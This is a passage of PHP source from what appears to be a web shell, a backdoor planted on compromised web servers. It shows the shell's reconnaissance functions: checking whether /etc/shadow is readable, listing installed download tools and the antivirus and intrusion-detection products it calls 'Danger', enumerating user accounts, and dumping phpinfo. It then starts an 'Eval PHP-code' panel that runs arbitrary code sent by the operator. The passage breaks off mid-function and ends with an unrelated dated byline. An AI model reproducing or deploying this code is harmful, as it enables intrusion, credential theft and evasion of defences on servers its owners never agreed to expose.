$temp[] = "Oracle";
arSecParam('Supported databases', implode(', ', $temp));
echo '<br>';

if($GLOBALS['os'] == 'nix') {
            // Readability checks on the account databases, then OS identification files.
            arSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no');
            arSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"shadow\")'>[view]</a>":'no');
            arSecParam('OS version', @file_get_contents('/proc/version'));
            arSecParam('Distr name', @file_get_contents('/etc/issue.net'));
            if(!$GLOBALS['safe_mode']) {
                // Three tool inventories: build/scripting tools, security products, download clients.
                $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
                $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
                $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
                echo '<br>';
                // Each loop keeps the names that arWhich() resolves on this host.
                $temp=array();
                foreach ($userful as $item)
                    if(arWhich($item))
                        $temp[] = $item;
                arSecParam('Userful', implode(', ',$temp));
                $temp=array();
                foreach ($danger as $item)
                    if(arWhich($item))
                        $temp[] = $item;
                arSecParam('Danger', implode(', ',$temp));
                $temp=array();
                foreach ($downloaders as $item)
                    if(arWhich($item))
                        $temp[] = $item;
                arSecParam('Downloaders', implode(', ',$temp));
                echo '<br/>';
                arSecParam('HDD space', arEx('df -h'));
                arSecParam('Hosts', @file_get_contents('/etc/hosts'));
                // Account enumeration over the client-supplied numeric UID range p2..p3.
                if (isset ($_POST['p2'], $_POST['p3']) && is_numeric($_POST['p2']) && is_numeric($_POST['p3'])) {
                    $temp = "";
                    for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {
                        $uid = @posix_getpwuid($_POST['p2']);
                        if ($uid)
                            $temp .= join(':',$uid)."\n";
                    }
                    echo '<br/>';
                    arSecParam('Users', $temp);
                }
            }
} else {
// Windows branch: version and account information via built-in commands.
arSecParam('OS Version',arEx('ver'));
arSecParam('Account Settings',arEx('net accounts'));
arSecParam('User Accounts',arEx('net user'));
}
echo '</div>';
arFooter();
}

function actionEval() {
   if(isset($_POST['p2']) && ($_POST['p2'] == 'ini')) {
                echo '<div class=content>';
                ob_start();
                $INI=ini_get_all();
print '<table border=0><tr>'
        .'<td class="listing"><font class="highlight_txt">Param</td>'
        .'<td class="listing"><font class="highlight_txt">Global value</td>'
        .'<td class="listing"><font class="highlight_txt">Local Value</td>'
        .'<td class="listing"><font class="highlight_txt">Access</td></tr>';
foreach ($INI as $param => $values)
        print "\n".'<tr>'
                .'<td class="listing"><b>'.$param.'</td>'
                .'<td class="listing">'.$values['global_value'].' </td>'
                .'<td class="listing">'.$values['local_value'].' </td>'
                .'<td class="listing">'.$values['access'].' </td></tr>';
                $tmp = ob_get_clean();
        $tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);
                $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
                echo str_replace('<h1','<h2', $tmp) .'</div><br>';
        }

    if(isset($_POST['p2']) && ($_POST['p2'] == 'info')) {
                echo '<div class=content><style>.p {color:#000;}</style>';
                ob_start();
                phpinfo();
                $tmp = ob_get_clean();
        $tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);
                $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
                echo str_replace('<h1','<h2', $tmp) .'</div><br>';
        }
    arHeader();
    if(isset($_POST['p2']) && ($_POST['p2'] == 'exten')) {
                echo '<div class=content>';
                ob_start();
             $EXT=get_loaded_extensions ();
     print '<table border=0><tr><td class="listing">'
        .implode('</td></tr>'."\n".'<tr><td class="listing">', $EXT)
        .'</td></tr></table>'
        .count($EXT).' extensions loaded';


        echo '</div><br>';
        }


        if(empty($_POST['ajax']) && !empty($_POST['p1']))
                $_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = false;
    echo '<h1>Eval PHP-code</h1><div class=content><form name=pf method=post onsubmit="g(\'Eval\',null,this.code.value,\'\'); return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea> <input type=submit value=Eval style="width:6%;"> ';
        echo '</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>';
        if(!empty($_POST['p1'])) {
 
[02-07-15] [Redazione]